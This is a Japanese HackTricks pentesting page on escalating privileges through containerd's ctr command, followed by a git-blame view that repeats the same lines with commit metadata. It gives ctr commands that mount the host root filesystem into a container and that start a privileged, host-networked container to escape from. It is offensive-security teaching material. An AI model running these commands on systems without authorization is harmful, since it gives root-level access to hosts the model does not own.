hacktricks/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md

# Containerd (ctr) 特権昇格

<details>

<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>！</strong></summary>

HackTricks をサポートする他の方法:

* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください！
* [**公式PEASS＆HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に **参加** または **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) **をフォロー** してください。
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して **あなたのハッキングテクニックを共有** してください。

</details>

## 基本情報

**containerd** と `ctr` が何かを学ぶには、以下のリンクに移動してください:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}

## PE 1

ホストに `ctr` コマンドが含まれていることがわかった場合:
```bash
which ctr
/usr/bin/ctr
```
以下は、画像をリストアップできます：

```shell
ctr images ls
```
```bash
ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
```
そして、**ホストのルートフォルダをマウントしているこれらのイメージの1つを実行します**:
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
## PE 2

特権付きコンテナを実行し、そこから脱出します。\
次のように特権付きコンテナを実行できます：
```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
次のページで言及されているいくつかの技術を使用して、特権付与機能を悪用してそれから脱出することができます：

{% content-ref url="docker-security/" %}
[docker-security](docker-security/)
{% endcontent-ref %}
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								# Containerd (ctr) 特権昇格
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								HackTricks をサポートする他の方法:
 								* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください！
 								* [**公式PEASS＆HackTricksグッズ**](https://peass.creator-spring.com)を入手する
 								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
 								* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に **参加** または **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) **をフォロー** してください。
 								* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して **あなたのハッキングテクニックを共有** してください。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								## 基本情報
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								**containerd** と `ctr` が何かを学ぶには、以下のリンクに移動してください:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
 								[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## PE 1
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								ホストに `ctr` コマンドが含まれていることがわかった場合:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								which ctr
 								/usr/bin/ctr
 								```
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								以下は、画像をリストアップできます：
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								```shell
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								ctr images ls
 								```
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								ctr image list
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
 								registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
 								registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								そして、**ホストのルートフォルダをマウントしているこれらのイメージの1つを実行します**:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## PE 2
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								特権付きコンテナを実行し、そこから脱出します。\
 								次のように特権付きコンテナを実行できます：
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/search-exploits.md', 'l

											
										
										
											2024-02-06 14:28:17 +00:00
+								次のページで言及されているいくつかの技術を使用して、特権付与機能を悪用してそれから脱出することができます：
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GITBOOK-3863: change request with no subject merged in GitBook

											
										
										
											2023-04-05 15:16:57 +00:00
+								{% content-ref url="docker-security/" %}
 								[docker-security](docker-security/)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}